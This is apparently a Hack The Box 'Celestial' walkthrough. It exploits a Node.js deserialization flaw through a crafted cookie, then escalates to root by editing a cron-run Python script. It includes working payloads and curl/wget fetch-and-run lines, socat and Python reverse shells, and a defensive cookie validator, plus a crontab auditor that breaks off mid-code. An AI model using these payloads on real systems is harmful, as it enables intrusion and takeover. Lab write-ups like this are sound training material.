&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/celestial# nmap -sV -sC -v -Pn --max-rate 500  10.10.10.85 -oA nmap/celestial_initial_scan 
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-22 18:45 EDT
...[snip]...
Host is up (0.15s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE VERSION
3000/tcp open  http    Node.js Express framework
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=utf-8).

NSE: Script Post-scanning.
Initiating NSE at 18:45
Completed NSE at 18:45, 0.00s elapsed
Initiating NSE at 18:45
Completed NSE at 18:45, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.90 seconds
           Raw packets sent: 1127 (49.588KB) | Rcvd: 1109 (44.364KB)

&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;After allowing a full port scan to run in the background, we discover that only port &lt;em&gt;3000&lt;/em&gt; is open externally on the box.&lt;/p&gt;

&lt;h3 id=&quot;enumerating-nodejs---port-3000&quot;&gt;Enumerating NodeJS - Port 3000&lt;/h3&gt;

&lt;p&gt;Visiting the nodejs application on port 3000 in a browser brings us to the following page stating that 2 + 2 is 22.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/htb/celestial/2.png&quot; alt=&quot;&amp;quot;NodeJS Application Landing Page&amp;quot;&quot; title=&quot;NodeJS Application Landing Page&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Attempting to enumerate the service with gobuster revealed no actionable results.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/celestial# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u  http://10.10.10.85:3000 -x php,html -s 200,204,301,302,307,403 -t 100 | tee gobuster_celestial

Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.85:3000/
[+] Threads      : 100
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 307,403,200,204,301,302
[+] Extensions   : .php,.html
=====================================================
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Inspecting the request in Burp, we can observe a cookie being set by the server with the key &lt;em&gt;profile&lt;/em&gt;. This stands out because the cookie value looks like base64-encoded &lt;code class=&quot;highlighter-rouge&quot;&gt;json&lt;/code&gt; data: it begins with the indicator &lt;code class=&quot;highlighter-rouge&quot;&gt;ey&lt;/code&gt; (the start of the base64 encoding of &lt;code class=&quot;highlighter-rouge&quot;&gt;{&quot;&lt;/code&gt;, a json object opening with a quoted key), and the &lt;code class=&quot;highlighter-rouge&quot;&gt;%3D%3D&lt;/code&gt; at the end is the URL-encoded form of the &lt;code class=&quot;highlighter-rouge&quot;&gt;==&lt;/code&gt; base64 padding, which tells us the data has been URL-encoded as well.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/htb/celestial/3.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Using Burp Suite’s Decoder module, we first URL decode the original string, then base64 decode the resultant data to get our original json object.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/htb/celestial/4.png&quot; alt=&quot;&amp;quot;Decoding Cookie&amp;quot;&quot; title=&quot;Decoding Cookie&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;&lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&quot;username&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;Dummy&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&quot;country&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;Idk Probably Somewhere Dumb&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&quot;city&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;Lametown&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&quot;num&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;2&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;After some googling for “NodeJS” vulnerabilities, you will come across the following articles on CVE-2017-5941, a NodeJS deserialization vulnerability.&lt;/p&gt;

&lt;p&gt;To sum up the vulnerability: the HTTP cookie value is passed to an unserialize() function, and since we (the attacker) control the cookie, we can craft a payload that exploits it. The key detail is that unserialize() treats any string value beginning with the marker &lt;code class=&quot;highlighter-rouge&quot;&gt;_$$ND_FUNC$$_&lt;/code&gt; as a serialized function and rebuilds it with eval(); appending &lt;code class=&quot;highlighter-rouge&quot;&gt;()&lt;/code&gt; to that function body makes it execute during deserialization itself, before the application ever touches the resulting object.&lt;/p&gt;

&lt;p&gt;References: &lt;a href=&quot;https://krfilms.net/v-exploiting-node-js-deserialization-bug-for-remote-code-execution-GFacPoWOcw0.html&quot;&gt;1&lt;/a&gt; - &lt;a href=&quot;https://hd7exploit.wordpress.com/2017/05/29/exploiting-node-js-deserialization-bug-for-remote-code-execution-cve-2017-5941/&quot;&gt;2&lt;/a&gt; - &lt;a href=&quot;https://www.cnblogs.com/yx20145312/p/7020206.html&quot;&gt;3&lt;/a&gt; - &lt;a href=&quot;https://vulners.com/myhack58/MYHACK58:62201783324&quot;&gt;4&lt;/a&gt;&lt;/p&gt;
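
&lt;p&gt;As an added example (not code from the write-up or from the Celestial application), the cookie handling in Python: the same URL-decode then base64-decode chain as the Burp Decoder steps above, followed by a parser that validates the decoded object and rejects any string carrying node-serialize’s &lt;code class=&quot;highlighter-rouge&quot;&gt;_$$ND_FUNC$$_&lt;/code&gt; function marker, which is the indicator a defender should be alerting on. The field names are the ones seen in the decoded cookie; treating them as the full schema is an assumption.&lt;/p&gt;

```python
# Added example, not code from the write-up or the Celestial box: the same
# URL-decode then base64-decode chain as the Burp Decoder steps, plus a
# parser that validates the result instead of handing it to node-serialize.
import base64
import json
import urllib.parse

# Marker node-serialize puts in front of a serialized function. unserialize()
# rebuilds any string with this prefix via eval(); a trailing "()" in the body
# makes it run during deserialization (the CVE-2017-5941 primitive).
FUNC_MARKER = "_$$ND_FUNC$$_"

# Fields the Celestial profile cookie was seen to carry (assumed to be the schema).
EXPECTED_FIELDS = {"username": str, "country": str, "city": str, "num": str}


def looks_like_b64_json(raw_cookie):
    """Triage heuristic from the write-up: base64 of '{"' starts with 'ey'."""
    return raw_cookie.startswith("ey")


def decode_profile_cookie(raw_cookie):
    """URL-decode (turns %3D back into =), then base64-decode to the JSON text."""
    b64 = urllib.parse.unquote(raw_cookie)
    return base64.b64decode(b64, validate=True).decode("utf-8")


def encode_profile_cookie(obj):
    """Inverse of decode_profile_cookie: JSON, base64, then URL-encode."""
    b64 = base64.b64encode(json.dumps(obj, separators=(",", ":")).encode("utf-8"))
    return urllib.parse.quote(b64.decode("ascii"), safe="")


def contains_serialized_function(value):
    """Walk a decoded value; True if any string carries the function marker."""
    if isinstance(value, str):
        return FUNC_MARKER in value
    if isinstance(value, list):
        return any(contains_serialized_function(v) for v in value)
    if isinstance(value, dict):
        return any(contains_serialized_function(v) for v in value.values())
    return False


def parse_profile_cookie(raw_cookie):
    """Decode and validate a profile cookie; never evaluates anything."""
    try:
        text = decode_profile_cookie(raw_cookie)
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return {"ok": False, "reason": "bad-encoding"}
    try:
        parsed = json.loads(text)
    except json.JSONDecodeError:
        return {"ok": False, "reason": "not-json"}
    if not isinstance(parsed, dict):
        return {"ok": False, "reason": "not-object"}
    if contains_serialized_function(parsed):
        # Worth logging: a legitimate client never sends this marker.
        return {"ok": False, "reason": "serialized-function"}
    profile = {}
    for key, expected_type in EXPECTED_FIELDS.items():
        if key in parsed:
            if not isinstance(parsed[key], expected_type):
                return {"ok": False, "reason": "bad-type:" + key}
            profile[key] = parsed[key]
    return {"ok": True, "profile": profile}


if __name__ == "__main__":
    # Constructed sample: the decoded cookie shown in the write-up.
    sample = {"username": "Dummy", "country": "Idk Probably Somewhere Dumb",
              "city": "Lametown", "num": "2"}
    cookie = encode_profile_cookie(sample)
    print(cookie)                      # starts with "ey", ends with %3D%3D
    print(parse_profile_cookie(cookie))
    # Constructed hostile value with a harmless body, just to trip the check.
    hostile = encode_profile_cookie({"run": FUNC_MARKER + "function (){return 1}()"})
    print(parse_profile_cookie(hostile))
```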

&lt;h2 id=&quot;exploitation&quot;&gt;Exploitation&lt;/h2&gt;

&lt;p&gt;Using the following tool, &lt;a href=&quot;https://github.com/hoainam1989/training-application-security/blob/master/shell/node_shell.py&quot;&gt;Node_Shell&lt;/a&gt;, we can craft a payload that exploits this deserialization vulnerability.&lt;/p&gt;

&lt;p&gt;Let’s first create a small test payload to validate that this is an exploitable vulnerability…&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/celestial# python node_shell.py -c &quot;curl http://10.10.15.10/hello&quot; -o -e

    =======&amp;gt; Happy hacking &amp;lt;======


    {&quot;run&quot;: &quot;_$$ND_FUNC$$_function (){eval(String.fromCharCode(10,32,32,32,32,32,32,32,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,40,39,99,117,114,108,32,104,116,116,112,58,47,47,49,48,46,49,48,46,49,53,46,49,48,47,104,101,108,108,111,39,44,32,102,117,110,99,116,105,111,110,40,101,114,114,111,114,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,99,111,110,115,111,108,101,46,108,111,103,40,101,114,114,111,114,41,10,32,32,32,32,32,32,32,32,32,32,32,32,99,111,110,115,111,108,101,46,108,111,103,40,115,116,100,111,117,116,41,10,32,32,32,32,32,32,32,32,125,41,10,32,32,32,32,32,32,32,32))}()&quot;}

&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;We will take the json object and base64 encode it.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/celestial# echo -n '{&quot;run&quot;: &quot;_$$ND_FUNC$$_function (){eval(String.fromCharCode(10,32,32,32,32,32,32,32,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,40,39,99,117,114,108,32,104,116,116,112,58,47,47,49,48,46,49,48,46,49,53,46,49,48,47,104,101,108,108,111,39,44,32,102,117,110,99,116,105,111,110,40,101,114,114,111,114,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,99,111,110,115,111,108,101,46,108,111,103,40,101,114,114,111,114,41,10,32,32,32,32,32,32,32,32,32,32,32,32,99,111,110,115,111,108,101,46,108,111,103,40,115,116,100,111,117,116,41,10,32,32,32,32,32,32,32,32,125,41,10,32,32,32,32,32,32,32,32))}()&quot;}' | base64
eyJydW4iOiAiXyQkTkRfRlVOQyQkX2Z1bmN0aW9uICgpe2V2YWwoU3RyaW5nLmZyb21DaGFyQ29k
ZSgxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMTQsMTAxLDExMywxMTcsMTA1LDExNCwxMDEs
NDAsMzksOTksMTA0LDEwNSwxMDgsMTAwLDk1LDExMiwxMTQsMTExLDk5LDEwMSwxMTUsMTE1LDM5
LDQxLDQ2LDEwMSwxMjAsMTAxLDk5LDQwLDM5LDk5LDExNywxMTQsMTA4LDMyLDEwNCwxMTYsMTE2
LDExMiw1OCw0Nyw0Nyw0OSw0OCw0Niw0OSw0OCw0Niw0OSw1Myw0Niw0OSw0OCw0NywxMDQsMTAx
LDEwOCwxMDgsMTExLDM5LDQ0LDMyLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCwx
MDEsMTE0LDExNCwxMTEsMTE0LDQ0LDMyLDExNSwxMTYsMTAwLDExMSwxMTcsMTE2LDQ0LDMyLDEx
NSwxMTYsMTAwLDEwMSwxMTQsMTE0LDQxLDMyLDEyMywxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwz
MiwzMiwzMiwzMiwzMiw5OSwxMTEsMTEwLDExNSwxMTEsMTA4LDEwMSw0NiwxMDgsMTExLDEwMyw0
MCwxMDEsMTE0LDExNCwxMTEsMTE0LDQxLDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMy
LDMyLDMyLDk5LDExMSwxMTAsMTE1LDExMSwxMDgsMTAxLDQ2LDEwOCwxMTEsMTAzLDQwLDExNSwx
MTYsMTAwLDExMSwxMTcsMTE2LDQxLDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDEyNSw0MSwx
MCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMikpfSgpIn0=
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Now all we have to do is intercept a request and set the &lt;code class=&quot;highlighter-rouge&quot;&gt;profile&lt;/code&gt; cookie to this value, remembering to URL-encode any &lt;code class=&quot;highlighter-rouge&quot;&gt;=&lt;/code&gt; characters as &lt;code class=&quot;highlighter-rouge&quot;&gt;%3D&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Doing so results in successful code execution.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/htb/celestial/5.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/htb/celestial/6.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;We can now very easily change our PoC to give us a reverse shell in a variety of ways. For example, the following payload will download and execute a socat reverse shell.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;contents of socat.sh&lt;/em&gt;&lt;/p&gt;

&lt;div class=&quot;language-sh highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;c&quot;&gt;#!/usr/bin/env bash&lt;/span&gt;
wget -q http://10.10.15.10:9999/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat &lt;span class=&quot;nb&quot;&gt;exec&lt;/span&gt;:&lt;span class=&quot;s1&quot;&gt;'bash -li'&lt;/span&gt;,pty,stderr,setsid,sigint,sane tcp:10.10.15.10:8181
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;using node_shell.py to create payload&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/celestial# python node_shell.py -c &quot;curl http://10.10.15.10/socat.sh | bash&quot; -o -e

    =======&amp;gt; Happy hacking &amp;lt;======


    {&quot;run&quot;: &quot;_$$ND_FUNC$$_function (){eval(String.fromCharCode(10,32,32,32,32,32,32,32,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,40,39,99,117,114,108,32,104,116,116,112,58,47,47,49,48,46,49,48,46,49,53,46,49,48,47,115,111,99,97,116,46,115,104,32,124,32,98,97,115,104,39,44,32,102,117,110,99,116,105,111,110,40,101,114,114,111,114,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,99,111,110,115,111,108,101,46,108,111,103,40,101,114,114,111,114,41,10,32,32,32,32,32,32,32,32,32,32,32,32,99,111,110,115,111,108,101,46,108,111,103,40,115,116,100,111,117,116,41,10,32,32,32,32,32,32,32,32,125,41,10,32,32,32,32,32,32,32,32))}()&quot;}
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;base64 encoding payload&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/celestial# echo -n '{&quot;run&quot;: &quot;_$$ND_FUNC$$_function (){eval(String.fromCharCode(10,32,32,32,32,32,32,32,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,40,39,99,117,114,108,32,104,116,116,112,58,47,47,49,48,46,49,48,46,49,53,46,49,48,47,115,111,99,97,116,46,115,104,32,124,32,98,97,115,104,39,44,32,102,117,110,99,116,105,111,110,40,101,114,114,111,114,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,99,111,110,115,111,108,101,46,108,111,103,40,101,114,114,111,114,41,10,32,32,32,32,32,32,32,32,32,32,32,32,99,111,110,115,111,108,101,46,108,111,103,40,115,116,100,111,117,116,41,10,32,32,32,32,32,32,32,32,125,41,10,32,32,32,32,32,32,32,32))}()&quot;}' | base64 | tr -d '\n'
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;getting shell&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/celestial# socat file:`tty`,raw,echo=0 tcp-listen:8181
sun@sun:~$ id
uid=1000(sun) gid=1000(sun) groups=1000(sun),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
sun@sun:~$ uname -a
Linux sun 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
sun@sun:~$ 
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;h2 id=&quot;privilege-escalation&quot;&gt;Privilege Escalation&lt;/h2&gt;
&lt;p&gt;While getting the &lt;code class=&quot;highlighter-rouge&quot;&gt;user.txt&lt;/code&gt; flag we can observe a strange python file called &lt;code class=&quot;highlighter-rouge&quot;&gt;script.py&lt;/code&gt;.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;sun@sun:~/Documents$ ls -la 
total 16
drwxr-xr-x  2 sun sun 4096 Mar  4 15:08 .
drwxr-xr-x 21 sun sun 4096 Aug 24 15:29 ..
-rw-rw-r--  1 sun sun   29 Sep 21  2017 script.py
-rw-rw-r--  1 sun sun   33 Sep 21  2017 user.txt
sun@sun:~/Documents$ cat script.py 
print &quot;Script is running...&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Going up a directory, we can observe a text file named &lt;code class=&quot;highlighter-rouge&quot;&gt;output.txt&lt;/code&gt;, owned by root, that contains exactly the text the python script prints.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;sun@sun:~$ ls -l
total 56
drwxr-xr-x  2 sun  sun  4096 Sep 19  2017 Desktop
drwxr-xr-x  2 sun  sun  4096 Mar  4 15:08 Documents
drwxr-xr-x  2 sun  sun  4096 Sep 19  2017 Downloads
-rw-r--r--  1 sun  sun  8980 Sep 19  2017 examples.desktop
drwxr-xr-x  2 sun  sun  4096 Sep 19  2017 Music
drwxr-xr-x 47 root root 4096 Sep 19  2017 node_modules
-rw-r--r--  1 root root   21 Mar  4 15:40 output.txt
drwxr-xr-x  2 sun  sun  4096 Sep 19  2017 Pictures
drwxr-xr-x  2 sun  sun  4096 Sep 19  2017 Public
-rw-rw-r--  1 sun  sun   870 Sep 20  2017 server.js
drwxr-xr-x  2 sun  sun  4096 Sep 19  2017 Templates
drwxr-xr-x  2 sun  sun  4096 Sep 19  2017 Videos
sun@sun:~$ cat output.txt
Script is running...
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Because &lt;code class=&quot;highlighter-rouge&quot;&gt;output.txt&lt;/code&gt; is owned by root and holds the script’s output, it appears that the root user is running whatever is in &lt;code class=&quot;highlighter-rouge&quot;&gt;script.py&lt;/code&gt; every 5 minutes. As we have permission to modify &lt;code class=&quot;highlighter-rouge&quot;&gt;script.py&lt;/code&gt;, I added the following content:&lt;/p&gt;

&lt;div class=&quot;language-python highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;
&lt;span class=&quot;k&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;Script is running...&quot;&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;hey test&quot;&lt;/span&gt;
&lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;socket&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;nn&quot;&gt;subprocess&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;nn&quot;&gt;os&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;s&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;socket&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;socket&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;socket&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;AF_INET&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;socket&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;SOCK_STREAM&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;s&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;connect&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;((&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;10.10.15.10&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;8282&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;));&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;os&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;dup2&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;s&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;fileno&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(),&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; 
&lt;span class=&quot;n&quot;&gt;os&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;dup2&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;s&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;fileno&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(),&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;os&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;dup2&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;s&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;fileno&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(),&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;subprocess&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;call&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;([&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;/bin/sh&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;-i&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;])&lt;/span&gt;

&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Now all we have to do is wait for root to run our script, which should give us a reverse shell as root…&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;sun@sun:~/Documents$ cat script.py
print &quot;Script is running...&quot;
print &quot;hey test&quot;
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((&quot;10.10.15.10&quot;,8282));os.dup2(s.fileno(),0) 
os.dup2(s.fileno(),1); os.dup2(s.fileno(),2)
p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;])
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Sure enough, we are delivered a fresh root shell after 5 minutes…&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/celestial# nc -lnvp 8282
listening on [any] 8282 ...
connect to [10.10.15.10] from (UNKNOWN) [10.10.10.85] 42792
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# uname -a 
Linux sun 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
# cat /root/root.txt 
ba1d0...[snip]...
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Looking at root’s crontab, we can see how this was happening.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;# crontab -l
# Edit this file to introduce tasks to be run by cron.
...[snip]....
# 
# m h  dom mon dow   command
*/5 * * * * python /home/sun/Documents/script.py &amp;gt; /home/sun/output.txt; cp /root/script.py /home/sun/Documents/script.py; chown sun:sun /home/sun/Documents/script.py; chattr -i /home/sun/Documents/script.py; touch -d &quot;$(date -R -r /home/sun/Documents/user.txt)&quot; /home/sun/Documents/script.py
&lt;/code&gt;&lt;/pre&gt;
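
&lt;p&gt;As an added example (not the write-up’s code), a small Python auditor for the pattern behind this escalation: a root cron job executing a file that a non-root user can modify. It pulls the absolute paths out of each crontab command and reports any that are non-root-owned, group- or world-writable, or a symlink, checked here against a constructed copy of the Celestial layout in a temporary directory.&lt;/p&gt;

```python
# Added example, not the write-up's code: audit crontab lines for files a
# non-root user could modify before root executes them (the script.py case).
import os
import re
import stat
import tempfile

# Absolute paths at the start of the command or after whitespace, ';' or '|'.
PATH_RE = re.compile(r"(?:^|[\s;|])(/[^\s;|'\"]+)")


def parse_crontab(text):
    """Return (schedule, command) pairs for every job line in a crontab dump."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue                      # blank lines and comments
        parts = line.split(None, 5)       # 5 time fields, then the command
        if len(parts) == 6:
            jobs.append((" ".join(parts[:5]), parts[5]))
    return jobs


def writable_by_non_root(path, trusted_uids=(0,)):
    """Return a reason string if someone outside trusted_uids can change path, else None."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return None                       # nothing to modify (yet)
    if stat.S_ISLNK(st.st_mode):
        return "symlink"                  # root would follow a user-controlled link
    if st.st_uid not in trusted_uids:
        return "owned by uid %d" % st.st_uid
    mode = stat.filemode(st.st_mode)      # e.g. '-rw-rw-r--', as shown by ls -l
    if mode[5] == "w":
        return "group-writable (%s)" % mode
    if mode[8] == "w":
        return "world-writable (%s)" % mode
    return None


def audit_crontab(text, trusted_uids=(0,)):
    """Map each risky path to (schedule, reason) for the jobs that reference it."""
    findings = {}
    for schedule, command in parse_crontab(text):
        for path in PATH_RE.findall(command):
            reason = writable_by_non_root(path, trusted_uids)
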